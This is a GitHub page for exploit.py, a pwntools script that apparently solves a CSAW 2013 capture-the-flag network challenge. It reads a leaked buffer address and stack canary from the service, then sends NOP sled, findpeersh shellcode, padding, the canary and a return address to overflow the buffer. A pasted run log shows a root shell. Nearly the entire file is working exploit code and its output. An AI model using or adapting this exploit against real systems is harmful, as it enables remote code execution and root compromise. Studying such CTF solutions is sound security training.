-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
36 lines (27 loc) · 980 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
HOST = '0.0.0.0'
PORT = 31338
r = remote(HOST, PORT) # getaddrinfo("0.0.0.0", "31338", (const struct addrinfo *)&v12, &v11)
buf_address = u32(r.recv(4)) # send(newsock, buffer, 4u, 0);
canary = u32(r.recv(4)) # send(newsock, &cookie, 4u, 0);
log.info("Buffer address: " + hex(buf_address))
log.info("Canary value: " + hex(canary))
buf_address = p32(buf_address)
canary = p32(canary)
nops = asm(shellcraft.nop()) * 10
shellcode = asm(pwnlib.shellcraft.i386.linux.findpeersh())
junk1 = "A" * (2048 - len(nops) - len(shellcode))
junk2 = "B" * 0xC # mov edx, [ebp-0Ch]
payload = nops + shellcode + junk1 + canary + junk2 + buf_address
r.sendafter("here:", payload)
r.interactive()
r.close()
'''
kaorz@kali:~/Exploiting/socket_csaw2013# python exploit.py
[+] Opening connection to 0.0.0.0 on port 31338: Done
[*] Buffer address: 0xffbe31dc
[*] Canary value: 0x25a6ce4
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
'''